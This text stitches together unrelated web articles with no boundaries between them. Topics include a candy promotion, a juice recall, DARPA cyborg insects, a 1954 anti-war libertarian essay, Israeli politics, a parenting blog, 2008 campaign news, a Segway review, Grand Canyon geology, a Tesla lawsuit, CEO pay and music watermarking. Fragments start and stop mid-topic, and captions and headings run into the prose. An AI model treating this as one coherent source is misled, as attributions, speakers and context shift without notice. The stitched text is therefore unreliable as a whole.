And , do n't worry , there will be more astounding Lollyphiles .
There are several surprises right now in the wings .
The Lollyphiles cost more than your average sucker , but they are worth it .
If you do n't devour all your pops , you can surprise a few of your very special friends and watch their pupils dilate as they recognize the taste .
Most likely , they will say , " Oh , my god !
Where did you get these ?
I have to have some ! "
Okay , I wo n't keep you waiting .
Here is your secret page to order Maple - Bacon Lollyphiles before Thursday , April 10 , 2008 .
No telling how long they will last !
After April 10 , you can purchase the Maple - Bacons and the Absinthe Lollyphiles directly from the Lollyphile website .
The Canadian Food Inspection Agency is warning parents about two different types of pear juice for toddlers that may be laced with arsenic .
The agency has issued recalls for President 's Choice Organics Pear Juice from Concentrate for Toddlers and Beech Nut Pear Juice from concentrate with Vitamin C added after discovering that they could contain the poison .
So far , the juice has n't caused any illnesses .
Garfield Balsom of the Canadian Food Inspection Agency said that they 're not sure how the poison ended up in the juice .
" At this point , the source is unknown .
That 's something we 're currently investigating . "
Balsom says that the amount of arsenic found in the juice suggests that the products were n't purposely poisoned .
" There 's no intentional implications here , " he said .
The juice was imported from the U.S. and is distributed across the country .
For years , now , Pentagon - backed researchers have been trying to create cyborg insects that could serve as living , remote - controlled spies .
The problem is , those modified bugs never survived long enough to be useful .
Now , Georgia
Tech professor Robert Michelson says he 's managed to get the bug ' borgs to live into adulthood .
DARPA 's Hi-MEMS program aims to implant place micro-mechanical systems [ MEMS ] " inside the insects during the early stages of metamorphosis , " the agency explains .
That way , as the bugs get older , tissues grow around – and fuse together with – the tiny machines .
* Flight International * reports that , in his latest work , Michelson truncated a Manduca moth 's thorax " to reduce its mass . "
Then he put in " a MEMS component ... where abdominal segments would have been , during the larval stage . "
* Images taken by x-ray of insects with these changes and others found that tissue growth around the inserted probes was good .
One DARPA goal is to show that during locomotion the heat and mechanical power generated by the thorax could be harnessed to power the MEMS . *
Ultimately ,
DARPA wants these MEMS to remote - operately the insects , either through
" direct electrical muscle excitation , electrical stimulation of neurons , projection of ultrasonic pulses simulating bats , [ or ]
projection of pheromones , " the agency says .
The ultimate goal would be to have the cyborgs " carry one or more sensors , such as a microphone or a gas sensor , [ and ] relay back information . "
* The realization of cyborgs with most of the machine component inside the insect body will provide stealthy robots that use muscle actuators which have been developed over millions of years of evolution .
*
The cyborgs also offer unparalleled opportunities for lab workers to shout , " It 's alive !
It 's aliiiiiiiive !!! "
ALSO :
Tags
[ This article originally appeared in the April 1954 issue of Faith and Freedom . ]
A sign of our time is the split - personality of the conservatives .
Many to the right of center are off on a schizophrenic pursuit of both liberty and collectivism .
In domestic affairs this regrettable condition is gradually being recognized for what it is .
But the time is nigh for conservative foreign policy , as well , to be psychoanalyzed in hope of a cure !
Conservatives call for free trade and free enterprise , yet also clamor for absolute embargoes on trade with Communist nations .
Have they forgotten that both parties to free exchange benefit from trade ?
For our government or any others to prohibit trade is a vicious example of socialistic policy ; it injures the Communist countries to be sure ; it also injures us .
Another example : conservatives are calling for lower taxes and less government control , while on the other hand they are calling for a virtual holy war against Russia and China , with all the costliness , death , and statism that such a war would necessarily entail .
Such a holy war would be immoral , inexpedient , and ill - conceived at best — in this day of weapons for mass murder , such a call is near insanity .
Yet while conservatives once preferred peace and " isolationism , " in our day they appeal in vague terms for liberation of foreign nations and hint that " We 've been at war with Communism for years , so let 's get it over with . "
They bitterly denounce European " allies " for being neutralistic and therefore " unreliable , " while they praise Chiang , Rhee , and Franco for being anti-Communist and therefore " reliable friends of the United States . "
They denounce our having entered the Korean War ; yet denounce the Korean Truce and call for programs to carry war ever upward and onward .
The notion — very widespread — that we should not have entered the Korean War , but once in it should have launched a total war against China , flouts rules of logic .
The best preventive of war is to refrain from warring — period .
If we had agreed to a cease - fire when the Commies suggested it , or had pulled out of Korea altogether ( even better ) , we would have saved thousands of American and Korean lives .
A " Blunt " Point
Here I think one point should be made and made bluntly .
Some people may prefer death to Communism ; and this is perfectly legitimate for them — although death may not often be a solution to any problem .
But suppose they also try to impose their will on other people who might prefer life under Communism to death in a " free world " cemetery .
Is not forcing them into mortal combat a pure and simple case of murder ?
And is not anti-Communist murder as evil as murder committed by Communists ?
Many " isolationists , " in concerning themselves with the liberation or security of foreign nations , have in truth become outright internationalists .
Instead of praising European neutralism — the equivalent of real American isolationism — they now demand collective - security organizations such as NATO .
Yet faith in international collectivism has already dragged us into one disastrous war after another during the present century .
And now it is a faith in world government , supposedly restricted to the enforcement of so - called world law .
This is a fantasy in which the various world states are seen as resembling a family of policemen taking it upon themselves to enforce a preservation of the status quo .
The result of this international - collectivistic approach is that the United States is rapidly going down the classic warpath .
And the path has all the signposts so unerringly pointed out by isolationist writers in the 1930s concerning the First World War , and in the 1940s concerning the Second World War : militarism , propaganda of hate , press distortions , atrocity stories about the enemy ( and silence about our own atrocities ) , chauvinistic vainglory such as pride that " America has won all its wars " ( but with the help of strong allies badly outnumbering the enemy ) , and in general , the " emotional complex of fear and vaunting " noted by Garet Garrett , which Harry Elmer Barnes calls the " 1984 pattern . "
The tragic part of the whole situation is that it is the erstwhile isolationists , the ones who above all others should know better , who are leading the war parade .
Many to the right of center are off on a schizophrenic pursuit of both liberty and collectivism . "
Sinking ever deeper into a war psychosis , these conservatives have failed to perceive that our whole problem today , broadly speaking , is ideological rather than military !
If we carefully examine the facts we will find that the most commonly feared threat to peace — the Communist bloc — has been fairly scrupulous about not committing military aggression .
All the Communist successes since the end of World War II have been through internal Communist rebellions .
Korea itself was a civil war , and there is even there considerable evidence that it was begun by the South .
Russia did not intervene directly in that war , and China intervened not only after the United States did , but only when our troops reached her borders .
Patience , plus sponsoring of Communist parties and philosophy abroad , seems to be the Soviet plan .
In brief , the Russian military menace is for the most part a bogey ; the Commies are probably truthful in their assertion that their arming is meant in defense .
The statement of Defense Secretary Wilson recently that Russian air production has been concentrated on defensive jets rather than offensive heavy bombers ( such as we are building ) would tend to bear out this point .
As a long - term threat as well , we should have no fear of military conquest by the Russians , or by the Chinese either .
They began as backward countries and , since we know Communism to be a relatively inefficient economic system , we need not worry about their offensive military might — provided we let our own industries grow without the hamperings of a garrison state .
What we really have to combat is all statism , and not just the Communist brand .
To take up arms against one set of socialists is not the way to stop socialism — indeed it is bound to increase socialism as all modern wars have done .
The Realm of Battle
The battle can only be waged in the realm of ideas and reason .
Man shall only tighten his chains — and those holding other men — if he takes up arms simply against one foreign statist faction .
Even if Russia and China both were to be wiped out tomorrow , Communism would continue to exist ( just as it did before 1917 ) so long as people continue to give credence to its collectivist tenets .
To attempt to stamp out heresy by force is the method of vindictive children , rather than the method of rational human beings .
But some conservatives are failing to recognize that the enemy is statism , rather than simply Communism .
And the fundamental reason , obviously , is that there is still an inadequate understanding of the very nature of the State .
It is a fundamental libertarian proposition that the State only has the right to use force to defend the person and property of individuals against force .
Actually , among libertarians and conservatives , there is agreement on that proposition ; but most conservatives usually commit the fatal error of stopping there .
Considering the analysis of the State closed , they conclude , " Therefore the State should be limited to what is necessary for defense purposes . "
Ponder the grave consequences of that reasoning :
Peter is a peaceful citizen , devoted to productive work and minding his own affairs .
By what right does any person or set of persons , in a group called the State , come to Peter and force him to give up money for the purpose of protecting him against possible future invasions of his person and property ?
The ethical answer can only be , no right whatsoever .
Surely we have all heard of and ridiculed the racketeering " protective syndicates , " which force merchants to purchase " protection " at an exorbitant fee .
Yet the State syndicate manages to impose its own " protection , " and to collect from Peter , with nary a single eyebrow being raised against it .
Not a Self - Respecting Racketeer
What is worse , the State gang does not even leave the scene of crime after collecting , as any self - respecting racketeer would do .
Instead it hangs around to harass Peter and his kind , insisting on continually higher sums of money in tribute , pressing the Peters into the State army when competing robber bands attack , coercing the Peters to salute the State battle flag , to acknowledge the State as their sovereign , to regard the decrees of State as valid laws to be obeyed by all righteous persons .
What would we think of the State gang , and what would we think of people who allowed themselves to be duped by the rulers ' propaganda to believe that this is all well and good , natural , and necessary ?
Yet , being duped by State officials is precisely what mankind has been putting up with for thousands of years .
Some might say that all this has been put to a stop in those nations which have turned to democracy .
But libertarians are surely not so enamored of the voting process that they fail to perceive the flaws in the democracy argument .
What democracy has done is simply to increase the number of State groups .
The question becomes :
Are we much better off now , having several groups ( or " parties " ) of would - be plunderers , each desiring the control of a good thing ?
I think the answer must be No .
The only advantage of a democracy is that it provides scope ( strictly limited ) for peaceful change of State rulers via ballot boxes , instead of requiring bloody revolutions , coup d'etats , etc .
Instead of having bloody civil wars over the spoils of State , the robber gangs have their subjects vote every few years as to which gang will rule them .
Never , however , do they so much as hint that the people may have a choice as to whether they wish to retain the State system itself .
Caught on the Horns
Thus , conservatives who say that the State should be limited to what is necessary for defense purposes , are caught from the start on the horns of a great dilemma .
For the State has been conceived in original sin .
Any State , even the best intentioned , subsists by means of coercion .
If Henry Thoreau says : I do n't want your protection , so will pay no more taxes ; he goes to jail — sent there by his " representatives . "
If he attempts to argue by saying : I wish to pay for my defense through privately financed police and judiciary companies , which I believe will be cheaper and far better than your coercive monopoly — the same punishment is meted out to him , or worse .
In a libertarian society though , it is the individual , not the State , which has the primary choice as to whether and how his defenses shall be maintained .
As an individual he has the right to fight in his own or another 's defense ; or , if he adjudges it foolhardy or disbelieves in fighting altogether , he has the right not to fight at all .
And similarly , he has the right to subscribe voluntarily to police forces and courts which offer defense , but also the right not to subscribe .
No one has the right to force him to fight or to pay others to fight for him .
If the State forces him to pay tax moneys for State - conceived defense purposes , the State thereby deprives him of his individual rights .
To sum up : every State oppresses its subjects and pillages them ; every State functions — as A.J. Nock put it — as if having a " monopoly ( or attempted monopoly ) of crime " in its territory , asserting its sovereignty over a certain land area , and exacting compulsory levies on the inhabitants .
Instead of having a group of policemen , we have in actuality a group of gangster States aggressing against their subject - citizens ; forming alliances , and from time to time fighting to increase their share of the spoils collected from the various inhabitants of the earth .
War is an attack by one robber band against another .
Surely under these prevailing conditions , the supposed morality of every State 's leaping to the defense of an alleged victim State becomes highly dubious indeed .
Yet no matter how evil States are , we must accept the fact that they do exist , and that there is no likely prospect of their imminent disappearance .
In a world of States and statism , then , what should the libertarian conservatives ' attitude be with regard to international discord ?
Municipal police have one rather appealing principle : they look the other way during a gang war .
If one set of gangsters " aggresses " against another set , the police do not participate .
Why waste the taxpayers ' money protecting one gangster against another ?
The Status Quo Might Not Be Moral
It is a version of that principle , I think , that ought to be applied to foreign affairs .
For if any world police force were to be set up to punish " aggressors , " the only result would be increased bloodshed and real aggression all over the world in an attempt to freeze the existing status quo , which might be a status quo no more moral , and perhaps less just , than any other possible one .
We could hardly blame those States that came late into the struggle for territorial influence , if they turned a jaundiced eye on the hypocritical moralizing of the entrenched aggressor States who would invoke world law to forestall new depredations .
States have always gained their territories by force , and any given land area has probably been fought over and changed hands many times .
In almost every case of " aggression " each party to the dispute , and often many parties , have some sort of historical claim to the disputed territory .
New territorial wars are no more " aggressive " than the present continuation of old conquests .
What is more , there always arises the difficulty of spotting the " real aggressor " in any particular war .
When both sides are armed camps , when there are many provocations , secret treaties , deals and frontier incidents , the question of unraveling the actual starter of war , let alone who is the more morally wrong , becomes a matter for the careful research of future historians .
Sad are the few facts which do not remain for historians to reveal .
These facts are that the people who end up conquered are subjected to the exactions and tyrannies of the master State ; while the original subjects of the conquering State are forced not only to fight the wars but also to foot the bills .
The wider a State attempts to extend its sphere of influence , indeed , the greater becomes its coercion against all concerned .
Once we clearly understand the ever - coercive nature of States , and the ever - recurrent warfare between them , we will no longer want to offer ourselves up unthinkingly before the international - collectivist altar inscribed , " Necessary for Defense . "
Instead we will keep these three facts in mind : that each State 's jurisdiction is limited , at any given time , to a certain geographical area over which it has assumed the power and responsibility of defense ; that within this area the State builds its defensive power by means of compulsory levies ; and that these levies involve immorality of conduct , because the act of forcing people to pay taxes for military defense usurps each individual 's right to choose how and whether he will want it .
The basic aim of our foreign policy then will become the greatest possible reduction of the amount of immorality ; in other words , reduction and limitation of the State 's area of assumed defense .
Upon our escutcheon will be inscribed these words : " Let there be peace .
Let not the State interfere in the affairs of other States . "
If the people of Korea are being oppressed , we will recognize that the oppressor State is vicious ; but we will at the same time recognize that it would be immoral for the United States government as such to interfere in any way .
For in so interfering , the American State would commit those of its citizens who have no wish to be committed , to battle for Korean citizens .
Interference , moreover , would in no way insure that the foreign people thus " liberated " would be any the better off for it .
Had the North won a quick victory in the recent Korean War , the Koreans might well have been left less unhappy and even economically better off under Communism than they are now under Rhee .
Millions have been slaughtered by the weapons of both sides , and those remaining have been left to contemplate the utter destruction of their property .
If some Americans wish to liberate the people of China or Poland , let them raise a private expeditionary force and private finances to go over and attempt liberation — but let them not try to commit the United States , and as a result , myself , to any such scheme .
For a second wrong simply will not make a right ; we should not add to oppression at home in a hope to effect some sort of " liberation " elsewhere .
Hold Down the State
The moral policy for libertarians is to see that the scope of war is kept as localized as possible .
The State must be held to its responsibility to enter no foreign war — and to provoke no war via rash and irresponsible statements , official condemnations of other governments , or inordinate armament buildups .
Even if our nation is directly attacked by another , justice for those who look askance upon war efforts and levies still requires that the scope of State action be kept within responsible limits .
The goal of all State action at such times must be a negotiated peace , so that the burden of destruction and taxes will cease .
The State should do its best to put limits and rules on the war , and to outlaw as many weapons of destruction as possible — starting with the worst .
Furthermore , so long as the emergency endures , all efforts should be kept voluntary — without conscription , economic controls , or inflation .
No purpose can be served when additional people are caused to lose their lives anywhere because of war .
The fact is , the quarrel in modern large - scale war is not actually between the subject people , but between their States .
The interest of the subjects is always in peace — since it is only in peace that full freedom for self - development can be attained .
War decidedly increases the dangers of losing further individual freedom — to the " domestic " enemy , if not to the " foreign " enemy .
In short , the individual subject will want the State to limit its objectives , to defend the country 's territory rather than to attack , to abstain from a drive to victory and unconditional surrender , and to negotiate peace at the earliest possible moment .
Moreover , if full terms of peace cannot be immediately decided upon , the most important thing becomes negotiation of a truce to stop the mutual slaughter .
If Men Are To Forge Fences
Not arms but public opinion must be the basic weapon if men are to forge fences between themselves and the master States .
By force of public opinion men must resist conscription ; must insist on absolute nonintervention in foreign wars ; and , where warfare is in progress , must call for immediate negotiations and an end to the bloodletting .
And most important , there must be a re-establishment of those once - revered rules of war that prevented innocent civilians from being harmed .
As a corollary , there must be a re-establishment of the old - fashioned , pre-1914 type of international law , as distinguished from the sort of world law the present - day internationalists would attempt to impose .
The old - time international law , as I understand it , set up rules by means of custom ( and not by force ) which carefully defined the difference between neutrality and intervention , and which declared sharply defined areas of neutrals ' rights and belligerents ' rights .
Old - fashioned international law facilitated the maintenance of neutrality and served the important purpose of greatly limiting the scope of any wars that arose .
Public opinion could then be educated to impose this type of international law to limit the scope of State action , just as Americans once used the Constitution and the Bill of Rights .
The United Nations , unfortunately , does not afford a good breeding ground for such constructive principles of international law and order .
For it is the seedling of a world State , a master imperialistic power that would dominate the citizens of the entire subject world .
Furthermore , the UN is basically committed to collective - security warfare against " aggression " and is therefore a warmongering organization in its very essence .
The Reds Are Sane
Somebody has rightly said that the choice now is : coexistence or nonexistence .
Any sane person prefers coexistence , and I am sure that the Reds are sane .
The issue facing the world , therefore , has to do with nurturing a will and a way to talk things over — to negotiate — and to find lines of fruitful negotiation .
Almost anything that would ease present tensions and provocations would be welcome .
But we must negotiate honestly and sincerely , with our foremost aim being an agreement for a jointly planned disarmament .
There must be no more secret deals with a Yalta - Potsdam odor , which would arbitrarily hand over territory and peoples of other countries to Russia .
And there must be no idea of simply bolstering our " allies " by making a mere show of negotiation .
On many issues , such as Korea , Germany , etc. , it would be better to just retire completely from the fray .
Yet the nurturing of a new era — of negotiation , of return to the pre-1914 type of international law , and of public opinion against statism — will all take time .
Meanwhile , along what lines should our American government take immediate action ?
To begin , the United States should pull out of the United Nations , and also out of the North Atlantic Treaty Alliance .
Secondly , our government .
should repudiate all other foreign commitments and agreements and foreign aid or " security " endeavors , while withdrawing the military from foreign bases .
As good a place to start as any is at Trieste .
American and British troops have absolutely no business there .
They are the original meddlers and interlopers .
Beginning with the mulcting of American and Triestino citizens alike of funds for occupational expenses , these troops have proceeded to the shooting down of inhabitants .
Clearly the withdrawal of our foreign - based troops is one of the primary orders of business , leaving interested parties to settle things for themselves .
Thirdly , the United States government should " recognize " Red China — on the basis of the old - fashioned international law principles of recognition .
Prior to the interventionism of Woodrow Wilson , it was always understood that recognition — especially by a neutralist state — does not imply moral approval .
The doctrine that it does has already been responsible for too many wars and bloodshed ( vide the Stimson policy toward Japan ) .
Recognition simply means recognizing the physical existence of a state — it is an act of sanity , not an act of praise .
Whether we like it or not , Chiang is now ruler of Formosa alone — and no mere recognition or nonrecognition will alter that fact .
Unfetter World Trade
Fourthly , there should be reestablishment of free and unhampered trade with the Communist countries , by our own nation and by all other nations .
Free world trade would not only help break down the iron curtain , but would benefit anti-Communist nations as well as Communist .
Nothing could be more inane than the present program of " helping other nations to help themselves " while at the same time coercively restricting their opportunities to engage in profitable commerce .
Above all , our foreign policy must not be self - defeating ; it must be consistent ; it must pursue peace instead of war ; and it must advance individual American freedom .
Many of Israel 's Arabs live in the north , near the sea of Galilee
It would be the first city built for Israel 's Arabs - who make up nearly 20 % of the population - since the country was founded in 1948 .
Mr Sheetrit said he wanted the plans to be completed and submitted for government approval by the year 's end .
Meanwhile , Israel announced plans for 1,100 new homes in East Jerusalem - a decision condemned by Palestinians .
" Once again we ask the Israeli government to give peace a chance by stopping all settlement activity , " Palestinian negotiator Saeb Erekat said .
Israeli settlements in the occupied territories are deemed illegal under international law .
' Modern city '
Mr Sheetrit announced plans for a new Arab city during a visit to the northern Arab town of Umm al - Fahm .
" I aspire to create a new Arab city in the Galilee and I am working on the planning for the project , " the interior minister said .
" It will be a modern city , where young couples can afford to buy property and live just like in any other city in the world , " he said .
Israel is home to about 1.2 million Arabs , who are the descendants of Palestinians who remained there after the state was formed in 1948 .
Mr Sheetrit 's announcement was welcomed by Samir Hussein , the Arab head of the local council in Dir Hanna , in the Galilee .
" I believe him and this sounds serious .
This is a tremendously important step , " he told Israeli news outlet Ynetnews.com .
" I have n't heard of such a plan , but I 'm sure it is feasible and that there are many places in the Galilee where such a city can be built quickly , " he added .
Mr Sheetrit was speaking only two days after hitting the headlines for his outspoken response to a rocket attack from Gaza that badly injured a young Israeli boy .
He told fellow cabinet members they should pick a neighbourhood in Gaza , give the inhabitants 24 hours to leave and " wipe it out " .
A couple years ago my former brother - in - law said something that had a profound effect on my views on being a dad .
My sister was preparing for a girls night out that weekend and my brother - in - law told me he had to " baby - sit " his son Friday night .
Baby - sit ?
The word itself struck me as odd , but after thinking about it some I realized many Dads use the word to refer to alone time with their own kids .
I thought that was called parenting .
Dads Can't Baby - sit
I know over the years , before I had kids myself , I used to joke with older guys , or married friends that they had to " baby - sit " this weekend if I knew their wives were away .
I 'm not sure when this became the accepted phrase , but I would sure like to see men stop using it .
Spending time with your children , feeding them , bathing them , and preparing them for bed is part of our responsibility as parents .
None of these particular parenting tasks are limited to be performed by moms .
If a guy is heading out on Saturday morning for a round or two of golf , moms do n't say , " Great , I 'll be here babysitting the kids . "
Not Just Semantics
One of our nation 's most discouraging statistics is that over half of marriages end in divorce .
Many times after a divorce fathers lose track of their children , moving on with their own lives and leaving the lives of their children behind .
This was the case in my own life , and I vowed to never let anything or anyone come between the relationships I would one day have with my own kids .
I wanted to be an involved dad .
I wanted to be the kind of dad that can get down in the floor and wrestle , or act silly on the trampoline .
I wanted to be the kind of dad that could hug and kiss his kids without feeling less " manly " for it .
I wanted to be the kind of dad who knew everything about his kids - their fears , their dreams , their favorite colors , their favorite flavor of ice cream , and their favorite Hannah Montanna song ( as an added bonus , I 've even learned some lyrics ! ) .
I never wanted to be the kind of dad that thought spending time with his kids would be relegated to babysitting , as if it was some kind of chore .
Dads , Change Your Vocabulary
The next time someone jokes with you about " babysitting " the kids , correct them .
" No , I 'm parenting Friday night . "
It is fun to watch the reaction , and you may have to explain yourself if they do n't get it right away .
But that 's ok , anything to avoid being labeled a mere babysitter .
UNION CITY , California ( Reuters ) - Republican John McCain took aim at presidential rival Barack Obama ’s lack of military service on Thursday , drawing a rebuke from the Democratic front - runner for his “ endless diatribes and schoolyard taunts . ”
McCain ’s opposition to Senate legislation that would expand educational benefits for military veterans ignited a heated cross - fire between the two White House contenders as they gear up for November ’s presidential election campaign .
McCain , a former Navy pilot and prisoner of war in Vietnam , reacted sharply after Obama criticized him for opposing the legislation .
The Arizona senator did not return to the Senate to vote on the measure , which passed easily .
“ I take a backseat to no one in my affection , respect and devotion to veterans , ” McCain said .
“ And I will not accept from Senator Obama , who did not feel it was his responsibility to serve our country in uniform , any lectures on my regard for those who did . ”
Obama , a Harvard - trained lawyer who did not serve in the military , drew McCain ’s ire by saying on the Senate floor : “ I ca n’t understand why he ( McCain ) would line up behind the president in opposition to this GI bill .
I ca n’t believe why he believes it is too generous to our veterans . ”
After McCain ’s tore into Obama for the attack , the Illinois senator responded by saying he was disappointed by it .
“ These endless diatribes and schoolyard taunts from the McCain campaign do nothing to advance the debate about what matters to the American people , ” Obama said .
At a subsequent news conference in Stockton , California , McCain said he opposed the legislation because he wanted to make sure the Defense Department retains some people for a career in the military .
The blistering exchange came as both candidates turn their attention to a likely match - up in November .
McCain has clinched the Republican nomination , and Obama has moved within reach of the Democratic nomination .
Obama ’s remaining rival , Sen. Hillary Clinton of New York , has promised to stay in the race despite his nearly unassailable lead in delegates who will select the Democratic nominee at an August convention .
The legislation that sparked the exchange was sponsored by Virginia Democratic Sen. James Webb and Nebraska Republican Sen. Chuck Hagel , both military veterans .
McCain and the Bush administration said it was so generous it could encourage veterans to leave the military after one term to take advantage of the increased college benefits .
‘ CHEAP SHOTS ’
McCain , who has stepped up his criticism of Obama but had not previously mentioned his lack of military service , said Obama had no right to criticize him on the issue .
Slideshow ( 6 images )
“ It is typical , but no less offensive , that Senator Obama uses the Senate floor to take cheap shots at an opponent and easy advantage of an issue he has less than zero understanding of , ” McCain said .
The exchange came as McCain campaigned in California , where he rejected the endorsement of a Texas preacher after derogatory comments about Jews made by the pastor were made public .
“ Obviously , I find these remarks and others deeply offensive and indefensible , and I repudiate them , ” McCain said of the remarks by John Hagee .
“ I did not know of them before Reverend Hagee ’s endorsement , and I feel I must reject his endorsement as well . ”
Slideshow ( 6 images )
McCain ’s statement came after The Huffington Post website reported on a late 1990s sermon Hagee gave in which he quoted from the Bible to make the argument that God ’s will had its influence on Nazism .
“ ‘ And they the hunters should hunt them , ’ that will be the Jews .
‘ From every mountain and from every hill and from out of the holes of the rocks . ’
If that does n’t describe what Hitler did in the Holocaust , you ca n’t see that , ” Hagee had said .
McCain previously had distanced himself from Hagee , founder of Cornerstone Church of San Antonio , Texas , but still accepted his endorsement because of Hagee ’s influence with evangelical Christians .
McCain , 71 , plans to show a small group of reporters his medical records on Friday before he enjoys the Memorial Day holiday weekend at his Arizona vacation house with three potential vice presidential candidates -- Florida Gov. Charlie Crist , Louisiana Gov. Bobby Jindal and former Massachusetts Gov. Mitt Romney .
“ It ’s just having a group of friends for Memorial Day weekend to visit us and enjoy one of the most beautiful places in America .
It ’s no more , and no less , ” said McCain .
Obama also has begun thinking about his potential vice presidential choice , asking Jim Johnson , the former chief executive of government mortgage giant Fannie Mae , to begin the search , TheAtlantic.com reported .
Johnson performed a similar role for Democratic candidates John Kerry in 2004 and Walter Mondale in 1984 .
( Additional reporting by Thomas Ferraro ; writing by John Whitesides ; editing by Mohammad Zargham )
( Fortune Magazine ) -- I 'll let you in on a troubling secret :
Ever since I married into a golf family , I 've struggled to hide my lack of enthusiasm for the game ( it 's impossible to hide my lack of talent ) .
It 's not the sport itself ; it 's the time it takes to play 18 holes .
Granted , I 'm a speed junkie , but after the first nine , I 'm done .
On a patient day .
The poky carts only add to my pain .
While I 've been sitting around dreaming about how to soup up a golf cart ( easier than practicing my swing ) , the inventors at Segway did one better :
Their latest model is the Segway X2 Golf .
Like its siblings , it 's a personal mobility machine , but it sits on big , soft turf tires and offers a golf - bag carrier on one side and a handlebar - mounted scorecard holder .
I originally bought the X2 as a present for my husband , hoping the novelty of buzzing around the green on it would distract him from noticing my absence .
Changing course
But then I tried it .
Never in my life of adrenaline addiction has going 12.5 mph - the X2's top speed - been so exhilarating .
It 's also compellingly easy , unlike the game it serves .
Like the original Segway , the X2 moves intuitively with you as you shift your weight .
Lean forward , you go forward ; lean back , you reverse ; lean sideways and you 'll pirouette on a dime - or less , actually :
The X2 has a zero - degree turning radius and seamlessly compensates for uneven terrain and hills .
A funny thing happened : Using the X2 sped up play by so much and was such a wildly fun distraction for me that I suddenly lost track of which hole I was playing - and my husband lost use of his X2 .
Fully charged , the machine has enough range to last 36 holes ( or 14 miles ) , but that 's one limit I need not find .
Let 's go to the dark side for a moment .
The novelty factor will involve you in a few too many tee - side conversations , and the urge to race the rest of your foursome may be impossible to withstand .
Worst of all , if you 're playing by the book you 'll have to don a helmet , which adds to the already high dork quotient of golf .
But considering I have been nicked by an errant ball once before , I suppose it 's a style glitch I can live with .
Segway inventor Dean Kamen originally envisioned his personal - transportation device effectively replacing the car for vast numbers of people .
For many reasons - cost being a key factor - that now looks like a pipe dream .
I do n't imagine the $ 6,175 X2 ( segway.com ) will replace golf carts anytime soon either , but if you try one , you 'll certainly wish they would .
WASHINGTON ( Reuters ) - The Grand Canyon , carved out over the eons by rushing river water , began to form 17 million years ago , making it nearly three times older than previously thought , scientists said on Thursday .
This undated picture shows a view of the thick layers of limestone that contain numerous caves in the Grand Canyon in Arizona .
A team of scientists from the University of New Mexico said in a study published in the journal Science that the Grand Canyon began to form 17 million years ago , making it older than previously thought .
REUTERS / Handout / John " Doug " Powell
The general consensus among geologists had been that the famed natural landmark in Arizona was about 6 million years old .
But now University of New Mexico scientists say it is far older based on their findings using a technique called uranium - lead isotope to date mineral deposits in caves from nine sites in the canyon ’s walls .
The cave formations provided a record of a dropping water table as the canyon deepened .
The gorge is 277 miles long , 1.1 miles deep at its deepest point and up to 18 miles wide .
The Colorado River that runs through it arises in the Rocky Mountains of Colorado and flows southwest about 1,400 miles to the Gulf of California .
The scientists found that there is a kind of dual history to the canyon , with the western portion starting to form about 17 million years ago when water from a predecessor to the Colorado River began the slow , inexorable process of eroding the rock , they said .
The eastern portion began forming closer to the 6 million - year - old date that had been the estimate for the whole canyon , they said .
“ Essentially , it formed in two parts , ” said Carol Hill , a University of New Mexico geologist .
“ The older Grand Canyon formed and then hooked up once the Colorado River became through - flowing ( all the way to the Gulf of California ) , then it hooked up with the eastern Grand Canyon . ”
The findings were published in the journal Science .
“ Not only were we able to figure out the time scale information but also the way that the canyon may have formed .
It was one of those beautiful complete stories , ” University of New Mexico scientist Yemane Asmerom added .
Untold tonnes of rocks were eroded away by the river .
“ One of the problems with trying to determine the age of the canyon is that the canyon - forming process itself removes all the material that would otherwise hint to its history and how old it is , ” University of New Mexico geologist Victor Polyak added .
Even with the latest findings , the canyon remains a relatively recent geological formation , considering the 4.5 billion - year history of the planet .
For example , the Rocky Mountains began to rise about 70 million years ago .
PERRspectives has compiled some of McSame 's more infamous statements about Iraq , here on the eve of the fifth anniversary of the Iraqi invasion .
Just in time for the fifth anniversary of the U.S. invasion , presumptive Republican presidential nominee John McCain made an unannounced visit to Iraq .
While McCain deemed the visit a " fact - finding " mission , his secret visit to Baghdad is just part of an extended photo opportunity in the Middle East and Europe designed to highlight his national security credentials .
Tesla Motors , maker of the much hyped ( and well reviewed ) electric Roadster is suing Fisker Automotive , the outfit behind fake vroom-y Karma , for stealing Tesla 's design and trade secrets .
Supposedly , this pushed the sale date for Tesla 's four - door sedan , White Star , back six months , to 2010 .
Henrik Fisker ( the eponymous founder ) was hired by Tesla to design White Star .
Tesla alleges he took the $ 875,000 contract , sabotaged Tesla 's project with sub -par work , and then made off with their secrets and designs , using the money to launch his rival electric car effort .
Advertisement
To fill the design gap and move things along , Tesla got some of the guys at Lotus to step in and massage the body design .
Man , I thought people designing green tech were out there to help people and keep us from dying in crazy " Day After Tomorrow " freak weather .
Not you know , actively undermining each other for their own selfish benefit .
Capitalism at its finest .
[ NYT ]
Which tech CEO earned just $ 1 in 2007 ?
Who raked in $ 74 million before retiring ?
Which newcomer managed to accumulate $ 3 million after less than two weeks on the job ?
When it comes to tallying top executives ' compensation packages , recent rules from the U.S. Securities and Exchange Commission make it tougher for public companies to be evasive .
Read on to find out what 30 technology chiefs cost their companies in 2007 , once their salaries , bonuses , stock awards and more are added together .
Note :
These figures are based on the summary compensation tables included in public companies ' proxy statements ( DEF 14A form ) , as filed with the SEC .
With all of the Big Four record labels now jettisoning digital rights management , music fans have every reason to rejoice .
But consumer advocates are singing a note of caution , as the music industry experiments with digital - watermarking technology as a DRM substitute .
Watermarking offers copyright protection by letting a company track music that finds its way to illegal peer - to - peer networks .
At its most precise , a watermark could encode a unique serial number that a music company could match to the original purchaser .
So far , though , labels say they wo n't do that : Warner and EMI have not embraced watermarking at all , while Sony 's and Universal 's DRM - free lineups contain " anonymous " watermarks that wo n't trace to an individual .
Still , privacy advocates were quick to point out that the watermarking is likely to produce fresh , empirical data that copyright material is ping - ponging across peer - to - peer sites – data the industry would use in its ongoing bid to tighten copyright controls , and to browbeat internet service providers to implement large - scale copyright - filtering operations .
" It gives them the ability to put pressure on policy makers and ISPs to do filtering , " said Fred Von Lohmann , an Electronic Frontier Foundation attorney .
Eric Garland , the chief executive officer of research group BigChampagne , said analyses of watermarked traffic can be done with " forensic precision , " and that the results could give the music industry hard evidence of copyright music transiting specific internet providers ' networks .
" Any empirical evidence that harm is being done to their legitimate business is a huge asset when it comes to their bargaining power with ISPs and third - party partners , " said Garland .
Sony BMG on Thursday became the final of the Big Four music concerns to announce it would sell its downloads free of DRM .
The others , Universal Music Group , Warner Music Group and EMI , made similar announcements last year – all in a bid to compete with Apple 's iTunes music store , which controls about 80 percent of the digital - download market with mostly DRM - laden songs .
